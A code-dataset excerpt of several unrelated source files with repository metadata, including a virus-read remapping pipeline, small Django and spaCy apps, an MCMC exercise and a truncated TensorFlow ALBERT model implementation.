listboxes[parameter] = listbox
listbox.bind('<<ListboxSelect>>', ListUpdater(parameter).update )
selections[parameter] = values[0]
for item in values:
listbox.insert(tkinter.END, item)
listbox.pack(side=tkinter.LEFT, fill=tkinter.BOTH, expand=1)
button = tkinter.Button( root, text="Launch", command=launch )
button.pack( side=tkinter.BOTTOM )
print(parameters)
root.geometry("800x300+10+10")
root.mainloop()
|
[
"[email protected]"
] | |
57cb562139621d6f43d8c42e92b2d5da13ae4e7b
|
36d1af455d542a3321289c974f4b1a2b4dadf3be
|
/StmtSeq.py
|
85d1258917c0d992e2784fe731b82dc6751a83dd
|
[] |
no_license
|
motomaniak/InterpreterProgram
|
778a1d24c1357c2465dd7610318e9676b82b8e84
|
0b4fe1e71cfc4d85388d5a3e60c602c9abf3d8e1
|
refs/heads/master
| 2021-01-10T14:35:27.242613 | 2017-01-27T21:43:07 | 2017-01-27T21:43:07 | 80,242,973 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 811 |
py
|
import Stmt
import pdb
class StmtSeq:
def __init__(self,t, inData):
self.st = Stmt.Stmt(t, inData)
self.case= 0
self.t = t
self.inData = inData
def parse(self):
if self.t.isStmt():
x = int(self.t.peek())
if x in [5,8,10,11,32]:
self.st.parse()
else:
print "There was an unintended error!"
exit()
self.st.parse()
else:
print "Expected valid statement token. Found %s" % self.t.peek()
#exit()
# Check if the following token is a StmtSeq
if self.t.isStmt():
self.case= 1
self.stsq = StmtSeq(self.t, self.inData)
self.stsq.parse()
def execute(self):
self.st.execute()
if self.case== 1:
self.stsq.execute()
def Print(self):
returnS = " " + self.st.Print()
if self.case== 1:
returnS += "\n" + self.stsq.Print()
return returnS
|
[
"[email protected]"
] | |
b907f96478917192ab46c9bd004800704b20c2dd
|
25f79d934fe25d67f5f9bcf464c52736e684a532
|
/singlecell/pipeline/map_patient_virus.py
|
eef68d84aecb45e9b4643fd3631259d378debba5
|
[
"MIT"
] |
permissive
|
iosonofabio/Zanini_et_al_DENV_patients_2018
|
f6e581a9db773fad49e491830fe36ab4b33a5c03
|
9d68c929d9d09d12ced9ade2d07673af2d142aa0
|
refs/heads/master
| 2023-02-20T18:44:22.603678 | 2018-09-23T18:27:28 | 2018-09-23T18:27:28 | 140,030,431 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 5,081 |
py
|
# vim: fdm=indent
'''
author: Fabio Zanini
date: 03/06/18
content: Pipeline for virus mapping within patients AFTER the rough virus
reads have been identified in the Snakemake pipeline. The thing is
Snakemake is VERY slow to construct that graph ;-)
'''
import os
import sys
import numpy as np
import pysam
import glob
import subprocess as sp
import shutil
import argparse
from singlecell.filenames import experiments_foldername, get_stampy_exec_filename
def shell(call, env=None):
if env is None:
env = os.environ.copy()
return sp.run(call, check=True, shell=True, env=env)
def pq(query_qualities):
qstring = ''.join([chr(q + 33) for q in query_qualities])
return qstring
def rc(seq, qual):
d = {'A': 'T', 'C': 'G', 'G': 'C', 'T': 'A', 'N': 'N'}
return (''.join([d[x] for x in seq])[::-1], qual[::-1])
def read_dict(read):
seq = read.query_sequence
qual = pq(read.query_qualities)
# reverse reads in BAM are transformed into positive strand, go back
if read.is_reverse:
(seq, qual) = rc(seq, qual)
return {
'name': read.qname,
'seq': seq,
'qual': qual,
}
if __name__ == '__main__':
pa = argparse.ArgumentParser(description='Patient virus mapping pipeline')
pa.add_argument('--experiments', nargs='+', required=True,
help='experiments to process')
pa.add_argument('--virus', choices=['dengue', 'zika'],
default='dengue',
help='What virus to remap to')
args = pa.parse_args()
virus = args.virus
for expname in args.experiments:
print(expname)
root_fdn = experiments_foldername+expname+'/'
raw_reads_fn = root_fdn+virus+'_reads.bam'
raw_reads_fastq_fns = [root_fdn+virus+'_read1.fastq', root_fdn+virus+'_read2.fastq']
remap_reads_fn = root_fdn+virus+'_remapped.bam'
reference_fn = root_fdn+virus+'_reference_hybrid.fasta'
if os.path.isfile(remap_reads_fn):
print('Remapped already, skip')
continue
print('First, make fastqs out of the bam')
with pysam.AlignmentFile(raw_reads_fn, 'rb') as bamfile,\
open(raw_reads_fastq_fns[0], 'wt') as fr1,\
open(raw_reads_fastq_fns[1], 'wt') as fr2:
fr_out = [fr1, fr2]
readname = None
pair = []
bfs = [[], []]
for read in bamfile:
if (read.qname != readname) and (len(pair) == 2):
for bf, d in zip(bfs, pair):
bf.append('@{:}\n{:}\n+\n{:}\n'.format(
d['name'],
d['seq'],
d['qual']))
# Keep buffers from overflowing
if len(bfs[0]) > 1000:
for bf, fr in zip(bfs, fr_out):
fr.write(''.join(bf))
bfs = [[], []]
pair = [read_dict(read)]
readname = read.qname
elif (read.qname == readname) and (len(pair) == 1):
pair.append(read_dict(read))
readname = read.qname
# Special case for the initial line
elif readname is None:
pair.append(read_dict(read))
readname = read.qname
else:
raise ValueError('Mwo ya?')
# Empty buffers
for bf, fr in zip(bfs, fr_out):
fr.write(''.join(bf))
bfs = [[], []]
print('Remap via stampy')
output_sam=remap_reads_fn[:-3]+'sam'
output_index=remap_reads_fn[:-3]+'stidx'
output_hash=remap_reads_fn[:-3]+'sthash'
output_prefix_sg='/stampy/'+os.path.basename(output_index[:-6])
reference_folder=os.path.dirname(reference_fn)
reference_sg='/stampy_reference/'+os.path.basename(reference_fn)
input_sg=['/stampy_input/'+os.path.basename(i) for i in raw_reads_fastq_fns]
output_sam_sg='/stampy/'+os.path.basename(output_sam)
input_folder=os.path.dirname(raw_reads_fn)
output_folder=os.path.dirname(output_index)
stampy=get_stampy_exec_filename()
stampy_call='singularity run -B '+output_folder+':/stampy -B '+input_folder+':/stampy_input -B '+reference_folder+':/stampy_reference '+stampy
shell("rm -f {:} {:} {:}".format(output_sam, output_index, output_hash))
shell(stampy_call+" -G {:} {:}".format(output_prefix_sg, reference_sg))
shell(stampy_call+" -g {:} -H {:}".format(output_prefix_sg, output_prefix_sg))
shell(stampy_call+" -g {:} -h {:} -o {:} --inputformat=fastq --substitutionrate=0.05 --sensitive -M {:} {:}".format(output_prefix_sg, output_prefix_sg, output_sam_sg, input_sg[0], input_sg[1]))
shell("samtools view -bT {:} {:} > {:}".format(reference_fn, output_sam, remap_reads_fn))
shell("rm {:}".format(output_sam))
|
[
"[email protected]"
] | |
f7903f29ba482880aa370a7cad1dd83fbbd716f8
|
0467d81be1bfebf1184d341cd2d20b2867525017
|
/kpi_tests_parser_for_git/csv_to_json.py
|
a706db6389c8e764cbd05ef82b2a39a842863276
|
[] |
no_license
|
ezik/tasks
|
464425efedbd62c9f3aba570c42e47cff2ca9865
|
e84d5d3054ba387b99e467583de15ece3f0cd6f1
|
refs/heads/master
| 2023-05-30T03:13:06.625484 | 2020-01-17T09:44:21 | 2020-01-17T09:44:21 | 226,717,653 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 698 |
py
|
import os
def csv_to_json(dir_path):
"""
Renames csv files to json. Initially results are generated as json files and re-formatted to csv. This
function reverse this.
:param dir_path: path where csv files from carlo kpi run located
:return: None
"""
for dirpath, _, filenames in os.walk(dir_path):
for file_name in filenames:
root, ext = os.path.splitext(file_name)
if ext == '.csv':
os.rename(os.path.join(dirpath, file_name), os.path.join(dirpath, root) + '.json')
elif ext == '.json':
print(file_name, 'OK')
else:
print(file_name, 'Cannot recognize extension')
|
[
"[email protected]"
] | |
bfb99ca7cd5dd92c96c283eb04c7ea701922e019
|
c2bccb70c592b72448ddf940e6caaa164279967f
|
/store/urls.py
|
227b8af651b8cb0861059fbc5cceea70d5a519ab
|
[] |
no_license
|
aloulouyessine/Django_Elfirma
|
28ea89e8d5ad5e049c9433a91a6fb0cb2a1031a1
|
11cfb311646be82230793839413f5c3f777d1640
|
refs/heads/master
| 2023-05-08T13:47:49.263655 | 2021-05-31T22:34:29 | 2021-05-31T22:34:29 | 372,638,813 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 451 |
py
|
from django.urls import path
from . import views
urlpatterns = [
#Leave as empty string for base url
path('', views.store, name="store"),
path('store/', views.store, name="store"),
path('cart/', views.cart, name="cart"),
path('checkout/', views.checkout, name="checkout"),
path('home/',views.home,name="home"),
path('update_item/', views.updateItem, name="update_item"),
path('process_order/', views.processOrder, name="process_order"),
]
|
[
"[email protected]"
] | |
c8fa0e588d99a5b271d5405f813a30aebee35779
|
9a92799e2ca8aa75895c0cc45e0077e5c0fe1fcd
|
/rasa-bot/drafts/spacy-server.py
|
2b90c696d2fa17085278af414cb708ed7833251b
|
[] |
no_license
|
gabrielboroghina/mem-assist-conv-agent
|
27a5b57f52f083d5c6777629ecf73f402fb08f72
|
c63afe5006070cc2a104a1236d287fb526c2b30a
|
refs/heads/master
| 2023-05-07T18:41:25.335378 | 2020-10-27T12:29:35 | 2020-10-27T12:29:35 | 246,593,375 | 0 | 0 | null | 2021-06-06T05:27:30 | 2020-03-11T14:28:12 |
CSS
|
UTF-8
|
Python
| false | false | 1,373 |
py
|
"""
Server for accessing spaCy's NLU features from a web application.
"""
from http.server import BaseHTTPRequestHandler, HTTPServer
import spacy
from spacy import displacy
nlp = spacy.load("spacy_ro")
PORT_NUMBER = 3333
class RequestHandler(BaseHTTPRequestHandler):
def parse(self, phrase):
doc = nlp(phrase)
options = {"add_lemma": True, "compact": True, "fine_grained": False}
htmlDep = displacy.render(doc, style="dep", page=True, options=options)
with open("dep-parse.html", "w", encoding='utf8') as f:
f.write(htmlDep)
# Handler for the POST requests
def do_POST(self):
self.send_response(200)
content_len = int(self.headers.get('Content-Length'))
phrase = self.rfile.read(content_len)
phrase = phrase.decode("utf-8")
print(phrase)
self.parse(phrase)
self.send_header('Content-type', 'text/plain')
self.end_headers()
# Send the html message
self.wfile.write(b"Hello World !")
return
try:
# Create a web server and define the handler to manage the incoming request
server = HTTPServer(('', PORT_NUMBER), RequestHandler)
print('Started httpserver on port ', PORT_NUMBER)
# Wait forever for incoming htto requests
server.serve_forever()
except KeyboardInterrupt:
server.socket.close()
|
[
"[email protected]"
] | |
de32c78c72c9358ec437b32cacdb93ba23c1fa23
|
744db61d9f5e548956022457e363ced4d3328878
|
/ps2/test_median_finder.py
|
b160274c0f3ae4256a7a7b7cfca04441470696e7
|
[] |
no_license
|
stuartsan/algscourse
|
26da00d07ffbe5132610102680078c6a9f559d57
|
56a784f40f1128219b84fabe3473f8e2ea30d65d
|
refs/heads/master
| 2021-01-01T18:34:39.105898 | 2014-04-11T00:24:08 | 2014-04-11T00:24:08 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 739 |
py
|
"""Test two simple ways of finding the median of a three-element list."""
import random
def m():
"""Test whether min(max(list)) returns the median. (It does not.)"""
while True:
k = 1000
lst = [random.randint(-k, k) for i in range(3)]
if sorted(lst)[1] != min(max(lst[0:2]), lst[2]):
break
print lst, sorted(lst)[1], min(max(lst[0:2]), lst[2])
def n():
"""Test whether popping min() and max() returns the median. (It does.)"""
while True:
k = 1000
lst = [random.randint(-k, k) for i in range(3)]
lst2 = lst[:]
lst.remove(max(lst))
lst.remove(min(lst))
if lst != [sorted(lst2)[1]]:
break
print lst, [sorted(lst2)[1]]
|
[
"[email protected]"
] | |
87004f51e72498ea8ff0fee7cfacb77dc1779270
|
ced8d87d1fa10d577516793102851bfd1ec32cfa
|
/arquivos.py
|
640eb9358537818068dbd56142a9a1498a6c6d09
|
[] |
no_license
|
JheniferElisabete/Python
|
6538adf58144791b62bd9f73f2c9b26b475035dd
|
f7873623fca53424b83cc483d86cf023e10158f5
|
refs/heads/main
| 2023-05-26T16:51:47.920078 | 2021-06-05T03:11:13 | 2021-06-05T03:11:13 | 373,354,220 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,110 |
py
|
'''
dentro de um arquivo de texto com o py de maneira automatica
w -> Escrever
a -> Alterar
r -> Ler
\n -> pula linha
'''
#declara um nome para o arquivo, se existir ele vai trabalhar em cima daquele arquivo, senão ele cria um novo (dentro da pasta que o arquivo principal esta)
#cria uma variavel e usa a função reservada open, na função é necessariuos passar 2 parametros (nome, como vou abrir o arquivo)
arquivo = open('aulaPython.txt','w')
# escrevendo dentro
##arquivo.write('Oi, tudo bem com vcs?')
#é possivel criar uma variavel texto
texto = '''
Oie tudo bem com voces
sou a jhenny
'''
#passando a variavel texto
arquivo.write(texto)
# sempre que abrir arquivo fechar
arquivo.close()
#alterar
arquivo = open('aulaPython.txt','a')
texto = '''Oie tudo bem com voces
sou a jhenny
'''
arquivo.write(texto)
arquivo.close()
#Ler
arquivo = open('aulaPython.txt','r')
##texto = arquivo.read()
##print(texto)
#cria uma lista com cada linhaque ele ler
texto = arquivo.readlines()
print(texto)
#mostra linha por linha
for i in texto:
print(i)
arquivo.close()
|
[
"[email protected]"
] | |
148a12685a56009ec0a4028f1e90bbb3f81672b6
|
a5fd6b06cfeed486e3729de3be2202140656eed6
|
/realtors/models.py
|
60444962715bcec8e28f72d5df9bb962c32ea960
|
[] |
no_license
|
Sevikus/btre_project
|
ca723bc1372d7a717d62d3efc430b245384b6d37
|
729b7e6e118a6a409e6ffdbd7f44f10a09d95a81
|
refs/heads/master
| 2020-09-30T04:02:43.627869 | 2019-12-10T19:25:29 | 2019-12-10T19:25:29 | 227,197,762 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 495 |
py
|
from django.db import models
from datetime import datetime
class Realtor(models.Model):
name = models.CharField(max_length=200)
photo = models.ImageField(upload_to='photos/%Y/%m/^d/')
description = models.TextField(blank=True)
phone = models.CharField(max_length=20)
email = models.CharField(max_length=50)
is_mvp = models.BooleanField(default=False)
hire_date = models.DateTimeField(default=datetime.now, blank=True)
def __str__(self):
return self.name
|
[
"[email protected]"
] | |
aaced4595be61166c67bc9e708fcdcf08989b133
|
45dd427ec7450d2fac6fe2454f54a130b509b634
|
/homework_6/a2.py
|
43866c4d2513ffd176bec3aca244d43524336665
|
[] |
no_license
|
weka511/smac
|
702fe183e3e73889ec663bc1d75bcac07ebb94b5
|
0b257092ff68058fda1d152d5ea8050feeab6fe2
|
refs/heads/master
| 2022-07-02T14:24:26.370766 | 2022-06-13T00:07:36 | 2022-06-13T00:07:36 | 33,011,960 | 22 | 8 | null | null | null | null |
UTF-8
|
Python
| false | false | 3,544 |
py
|
'''
Path sampling: A firework of algorithms
This program encompasses both version of the program from step A2.
Function 'evolve' carries out the Markov Chain Monte Carlo evolution,
'plot' produces the graphs, and 'compare' allows us to judge whether the
distributions match.
'''
import random, math, pylab
alpha = 0.5
nsteps = 1000000
def gauss_cut(cut=1.0):
while True:
x = random.gauss(0.0, 1.0)
if abs(x) <= cut:
return x
def compare(x1s,y1s,x2s,y2s,bins=(30,30),xrange=(-1,+1),yrange=(-1,1)):
'''
Compare samples from two 2D distribitions by generating counts for two
histograms, then calculating and plotting ratios.
Ideally we should see small random variations about unity, not
systematic differences, as long as the two distributions are the same.
Arguments:
x1s X coordinates of points sampled from 1st distibution
y1s Y coordinates of points sampled from 1st distibution
x2s X coordinates of points sampled from 2nd distibution
y2s Y coordinates of points sampled from 2nd distibution
bins Number of bins (X & Y) for data
xrange Range of x data
yrange Range of y data
'''
w,h=bins
xmin,xmax=xrange
ymin,ymax=yrange
def histogram(xs,ys):
def index (u,umin,umax,r):
return int((r-1)*(u-umin)/(umax-umin))
counts = [[0 for x in range(w)] for y in range(h)]
for x,y in zip(xs,ys):
i = index(x,xmin,xmax,w)
j = index(y,ymin,ymax,h)
counts[i][j]+=1
return counts
h1=[item for sublist in histogram(x1s,y1s) for item in sublist]
h2=[item for sublist in histogram(x2s,y2s) for item in sublist]
h3=[abs (a/b if b>0 else 1 if a==0 else 0) for (a,b) in zip(h1,h2)]
iis = [i for i in range(len(h1))]
pylab.plot(iis,h3,'g') # iis,h1,'r',iis,h2,'b',
def evolve(proposer=lambda: random.uniform(-1.0, 1.0),
accepter=lambda u:math.exp(-0.5 * u ** 2 - alpha * u ** 4 )):
'''
Perform Markov Chain Monte Carlo evolution
Arguments:
proposer Function which proposes data to be used for the next step
accepter Function which decides whether to accept proposed value
'''
samples_x = []
samples_y = []
x, y = 0.0, 0.0
for step in range(nsteps):
if step % 2 == 0:
while True:
x = proposer()
p = accepter(x)
if random.uniform(0.0, 1.0) < p:
break
else:
while True:
y = proposer()
p = accepter(y)
if random.uniform(0.0, 1.0) < p:
break
samples_x.append(x)
samples_y.append(y)
return (samples_x, samples_y)
def plot(name,samples_x, samples_y):
pylab.hexbin(samples_x, samples_y, gridsize=50, bins=1000)
pylab.axis([-1.0, 1.0, -1.0, 1.0])
cb = pylab.colorbar()
pylab.xlabel('x')
pylab.ylabel('y')
pylab.title(name)
pylab.savefig('{0}.png'.format(name))
# Evolve and plot with uniform distribution
pylab.figure(1)
(x1s, y1s)=evolve()
plot('A2_1',x1s, y1s)
# Evolve and plot with gauss_cut
pylab.figure(2)
(x2s, y2s)=evolve(proposer=gauss_cut,
accepter=lambda u:math.exp(- alpha * u ** 4 ))
plot('A2_2',x2s, y2s)
pylab.figure(3)
compare(x1s,y1s,x2s,y2s)
pylab.show()
|
[
"[email protected]"
] | |
31d16535084b7bbe5bd6380d13b40cdeb814e697
|
1b2a1f807b98034567e936b9b5c76c2fc89b908a
|
/adj_tf/models/albert/modeling_tf_albert.py
|
41dc434e0cb716761948190ee55d9a1250aa5a9e
|
[] |
no_license
|
Adreambottle/Transformer2GP
|
48c955d8eb155caef4c24a3c03ee3aa9ab0bd3da
|
5ba1a5005c2ad21066304cdeb1d7c2587c8191da
|
refs/heads/main
| 2023-07-07T14:17:51.673437 | 2021-08-17T14:14:56 | 2021-08-17T14:14:56 | 397,279,894 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 70,146 |
py
|
# coding=utf-8
# Copyright 2018 The OpenAI Team Authors and HuggingFace Inc. team.
# Copyright (c) 2018, NVIDIA CORPORATION. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
""" TF 2.0 ALBERT model. """
import math
from dataclasses import dataclass
from typing import Dict, Optional, Tuple, Union
import numpy as np
import tensorflow as tf
from ...activations_tf import get_tf_activation
from ...file_utils import (
MULTIPLE_CHOICE_DUMMY_INPUTS,
ModelOutput,
add_code_sample_docstrings,
add_start_docstrings,
add_start_docstrings_to_model_forward,
replace_return_docstrings,
)
from ...modeling_tf_outputs import (
TFBaseModelOutput,
TFBaseModelOutputWithPooling,
TFMaskedLMOutput,
TFMultipleChoiceModelOutput,
TFQuestionAnsweringModelOutput,
TFSequenceClassifierOutput,
TFTokenClassifierOutput,
)
from ...modeling_tf_utils import (
TFMaskedLanguageModelingLoss,
TFModelInputType,
TFMultipleChoiceLoss,
TFPreTrainedModel,
TFQuestionAnsweringLoss,
TFSequenceClassificationLoss,
TFTokenClassificationLoss,
get_initializer,
input_processing,
keras_serializable,
shape_list,
)
from ...utils import logging
from .configuration_albert import AlbertConfig
logger = logging.get_logger(__name__)
_CONFIG_FOR_DOC = "AlbertConfig"
_TOKENIZER_FOR_DOC = "AlbertTokenizer"
TF_ALBERT_PRETRAINED_MODEL_ARCHIVE_LIST = [
"albert-base-v1",
"albert-large-v1",
"albert-xlarge-v1",
"albert-xxlarge-v1",
"albert-base-v2",
"albert-large-v2",
"albert-xlarge-v2",
"albert-xxlarge-v2",
# See all ALBERT models at https://huggingface.co/models?filter=albert
]
class TFAlbertPreTrainingLoss:
"""
Loss function suitable for ALBERT pretraining, that is, the task of pretraining a language model by combining SOP +
MLM. .. note:: Any label of -100 will be ignored (along with the corresponding logits) in the loss computation.
"""
def compute_loss(self, labels: tf.Tensor, logits: tf.Tensor) -> tf.Tensor:
loss_fn = tf.keras.losses.SparseCategoricalCrossentropy(
from_logits=True, reduction=tf.keras.losses.Reduction.NONE
)
# make sure only labels that are not equal to -100
# are taken into account as loss
masked_lm_active_loss = tf.not_equal(tf.reshape(tensor=labels["labels"], shape=(-1,)), -100)
masked_lm_reduced_logits = tf.boolean_mask(
tensor=tf.reshape(tensor=logits[0], shape=(-1, shape_list(logits[0])[2])),
mask=masked_lm_active_loss,
)
masked_lm_labels = tf.boolean_mask(
tensor=tf.reshape(tensor=labels["labels"], shape=(-1,)), mask=masked_lm_active_loss
)
sentence_order_active_loss = tf.not_equal(tf.reshape(tensor=labels["sentence_order_label"], shape=(-1,)), -100)
sentence_order_reduced_logits = tf.boolean_mask(
tensor=tf.reshape(tensor=logits[1], shape=(-1, 2)), mask=sentence_order_active_loss
)
sentence_order_label = tf.boolean_mask(
tensor=tf.reshape(tensor=labels["sentence_order_label"], shape=(-1,)), mask=sentence_order_active_loss
)
masked_lm_loss = loss_fn(y_true=masked_lm_labels, y_pred=masked_lm_reduced_logits)
sentence_order_loss = loss_fn(y_true=sentence_order_label, y_pred=sentence_order_reduced_logits)
masked_lm_loss = tf.reshape(tensor=masked_lm_loss, shape=(-1, shape_list(sentence_order_loss)[0]))
masked_lm_loss = tf.reduce_mean(input_tensor=masked_lm_loss, axis=0)
return masked_lm_loss + sentence_order_loss
class TFAlbertEmbeddings(tf.keras.layers.Layer):
"""Construct the embeddings from word, position and token_type embeddings."""
def __init__(self, config: AlbertConfig, **kwargs):
super().__init__(**kwargs)
self.vocab_size = config.vocab_size
self.type_vocab_size = config.type_vocab_size
self.embedding_size = config.embedding_size
self.max_position_embeddings = config.max_position_embeddings
self.initializer_range = config.initializer_range
self.embeddings_sum = tf.keras.layers.Add()
self.LayerNorm = tf.keras.layers.LayerNormalization(epsilon=config.layer_norm_eps, name="LayerNorm")
self.dropout = tf.keras.layers.Dropout(rate=config.hidden_dropout_prob)
def build(self, input_shape: tf.TensorShape):
with tf.name_scope("word_embeddings"):
self.weight = self.add_weight(
name="weight",
shape=[self.vocab_size, self.embedding_size],
initializer=get_initializer(self.initializer_range),
)
with tf.name_scope("token_type_embeddings"):
self.token_type_embeddings = self.add_weight(
name="embeddings",
shape=[self.type_vocab_size, self.embedding_size],
initializer=get_initializer(self.initializer_range),
)
with tf.name_scope("position_embeddings"):
self.position_embeddings = self.add_weight(
name="embeddings",
shape=[self.max_position_embeddings, self.embedding_size],
initializer=get_initializer(self.initializer_range),
)
super().build(input_shape)
# Copied from adj_tf.models.bert.modeling_tf_bert.TFBertEmbeddings.call
def call(
self,
input_ids: tf.Tensor = None,
position_ids: tf.Tensor = None,
token_type_ids: tf.Tensor = None,
inputs_embeds: tf.Tensor = None,
training: bool = False,
) -> tf.Tensor:
"""
Applies embedding based on inputs tensor.
Returns:
final_embeddings (:obj:`tf.Tensor`): output embedding tensor.
"""
assert not (input_ids is None and inputs_embeds is None)
if input_ids is not None:
inputs_embeds = tf.gather(params=self.weight, indices=input_ids)
input_shape = shape_list(inputs_embeds)[:-1]
if token_type_ids is None:
token_type_ids = tf.fill(dims=input_shape, value=0)
if position_ids is None:
position_ids = tf.expand_dims(tf.range(start=0, limit=input_shape[-1]), axis=0)
position_embeds = tf.gather(params=self.position_embeddings, indices=position_ids)
position_embeds = tf.tile(input=position_embeds, multiples=(input_shape[0], 1, 1))
token_type_embeds = tf.gather(params=self.token_type_embeddings, indices=token_type_ids)
final_embeddings = self.embeddings_sum(inputs=[inputs_embeds, position_embeds, token_type_embeds])
final_embeddings = self.LayerNorm(inputs=final_embeddings)
final_embeddings = self.dropout(inputs=final_embeddings, training=training)
return final_embeddings
class TFAlbertAttention(tf.keras.layers.Layer):
""" Contains the complete attention sublayer, including both dropouts and layer norm. """
def __init__(self, config: AlbertConfig, **kwargs):
super().__init__(**kwargs)
if config.hidden_size % config.num_attention_heads != 0:
raise ValueError(
f"The hidden size ({config.hidden_size}) is not a multiple of the number "
f"of attention heads ({config.num_attention_heads})"
)
self.num_attention_heads = config.num_attention_heads
self.attention_head_size = int(config.hidden_size / config.num_attention_heads)
self.all_head_size = self.num_attention_heads * self.attention_head_size
self.sqrt_att_head_size = math.sqrt(self.attention_head_size)
self.output_attentions = config.output_attentions
self.query = tf.keras.layers.Dense(
units=self.all_head_size, kernel_initializer=get_initializer(config.initializer_range), name="query"
)
self.key = tf.keras.layers.Dense(
units=self.all_head_size, kernel_initializer=get_initializer(config.initializer_range), name="key"
)
self.value = tf.keras.layers.Dense(
units=self.all_head_size, kernel_initializer=get_initializer(config.initializer_range), name="value"
)
self.dense = tf.keras.layers.Dense(
units=config.hidden_size, kernel_initializer=get_initializer(config.initializer_range), name="dense"
)
self.LayerNorm = tf.keras.layers.LayerNormalization(epsilon=config.layer_norm_eps, name="LayerNorm")
# Two different dropout probabilities; see https://github.com/google-research/albert/blob/master/modeling.py#L971-L993
self.attention_dropout = tf.keras.layers.Dropout(rate=config.attention_probs_dropout_prob)
self.output_dropout = tf.keras.layers.Dropout(rate=config.hidden_dropout_prob)
def transpose_for_scores(self, tensor: tf.Tensor, batch_size: int) -> tf.Tensor:
# Reshape from [batch_size, seq_length, all_head_size] to [batch_size, seq_length, num_attention_heads, attention_head_size]
tensor = tf.reshape(tensor=tensor, shape=(batch_size, -1, self.num_attention_heads, self.attention_head_size))
# Transpose the tensor from [batch_size, seq_length, num_attention_heads, attention_head_size] to [batch_size, num_attention_heads, seq_length, attention_head_size]
return tf.transpose(tensor, perm=[0, 2, 1, 3])
def call(
self,
input_tensor: tf.Tensor,
attention_mask: tf.Tensor,
head_mask: tf.Tensor,
output_attentions: bool,
training: bool = False,
) -> Tuple[tf.Tensor]:
batch_size = shape_list(input_tensor)[0]
mixed_query_layer = self.query(inputs=input_tensor)
mixed_key_layer = self.key(inputs=input_tensor)
mixed_value_layer = self.value(inputs=input_tensor)
query_layer = self.transpose_for_scores(mixed_query_layer, batch_size)
key_layer = self.transpose_for_scores(mixed_key_layer, batch_size)
value_layer = self.transpose_for_scores(mixed_value_layer, batch_size)
# Take the dot product between "query" and "key" to get the raw attention scores.
# (batch size, num_heads, seq_len_q, seq_len_k)
attention_scores = tf.matmul(query_layer, key_layer, transpose_b=True)
dk = tf.cast(self.sqrt_att_head_size, dtype=attention_scores.dtype)
attention_scores = tf.divide(attention_scores, dk)
if attention_mask is not None:
# Apply the attention mask is (precomputed for all layers in TFAlbertModel call() function)
attention_scores = tf.add(attention_scores, attention_mask)
# Normalize the attention scores to probabilities.
attention_probs = tf.nn.softmax(logits=attention_scores, axis=-1)
# This is actually dropping out entire tokens to attend to, which might
# seem a bit unusual, but is taken from the original Transformer paper.
attention_probs = self.attention_dropout(inputs=attention_probs, training=training)
# Mask heads if we want to
if head_mask is not None:
attention_probs = tf.multiply(attention_probs, head_mask)
context_layer = tf.matmul(attention_probs, value_layer)
context_layer = tf.transpose(context_layer, perm=[0, 2, 1, 3])
# (batch_size, seq_len_q, all_head_size)
context_layer = tf.reshape(tensor=context_layer, shape=(batch_size, -1, self.all_head_size))
self_outputs = (context_layer, attention_probs) if output_attentions else (context_layer,)
hidden_states = self_outputs[0]
hidden_states = self.dense(inputs=hidden_states)
hidden_states = self.output_dropout(inputs=hidden_states, training=training)
attention_output = self.LayerNorm(inputs=hidden_states + input_tensor)
# add attentions if we output them
outputs = (attention_output,) + self_outputs[1:]
return outputs
class TFAlbertLayer(tf.keras.layers.Layer):
def __init__(self, config: AlbertConfig, **kwargs):
super().__init__(**kwargs)
self.attention = TFAlbertAttention(config, name="attention")
self.ffn = tf.keras.layers.Dense(
units=config.intermediate_size, kernel_initializer=get_initializer(config.initializer_range), name="ffn"
)
if isinstance(config.hidden_act, str):
self.activation = get_tf_activation(config.hidden_act)
else:
self.activation = config.hidden_act
self.ffn_output = tf.keras.layers.Dense(
units=config.hidden_size, kernel_initializer=get_initializer(config.initializer_range), name="ffn_output"
)
self.full_layer_layer_norm = tf.keras.layers.LayerNormalization(
epsilon=config.layer_norm_eps, name="full_layer_layer_norm"
)
self.dropout = tf.keras.layers.Dropout(rate=config.hidden_dropout_prob)
def call(
self,
hidden_states: tf.Tensor,
attention_mask: tf.Tensor,
head_mask: tf.Tensor,
output_attentions: bool,
training: bool = False,
) -> Tuple[tf.Tensor]:
attention_outputs = self.attention(
input_tensor=hidden_states,
attention_mask=attention_mask,
head_mask=head_mask,
output_attentions=output_attentions,
training=training,
)
ffn_output = self.ffn(inputs=attention_outputs[0])
ffn_output = self.activation(ffn_output)
ffn_output = self.ffn_output(inputs=ffn_output)
ffn_output = self.dropout(inputs=ffn_output, training=training)
hidden_states = self.full_layer_layer_norm(inputs=ffn_output + attention_outputs[0])
# add attentions if we output them
outputs = (hidden_states,) + attention_outputs[1:]
return outputs
class TFAlbertLayerGroup(tf.keras.layers.Layer):
def __init__(self, config: AlbertConfig, **kwargs):
super().__init__(**kwargs)
self.albert_layers = [
TFAlbertLayer(config, name="albert_layers_._{}".format(i)) for i in range(config.inner_group_num)
]
def call(
self,
hidden_states: tf.Tensor,
attention_mask: tf.Tensor,
head_mask: tf.Tensor,
output_attentions: bool,
output_hidden_states: bool,
training: bool = False,
) -> Union[TFBaseModelOutput, Tuple[tf.Tensor]]:
layer_hidden_states = () if output_hidden_states else None
layer_attentions = () if output_attentions else None
for layer_index, albert_layer in enumerate(self.albert_layers):
if output_hidden_states:
layer_hidden_states = layer_hidden_states + (hidden_states,)
layer_output = albert_layer(
hidden_states=hidden_states,
attention_mask=attention_mask,
head_mask=head_mask[layer_index],
output_attentions=output_attentions,
training=training,
)
hidden_states = layer_output[0]
if output_attentions:
layer_attentions = layer_attentions + (layer_output[1],)
# Add last layer
if output_hidden_states:
layer_hidden_states = layer_hidden_states + (hidden_states,)
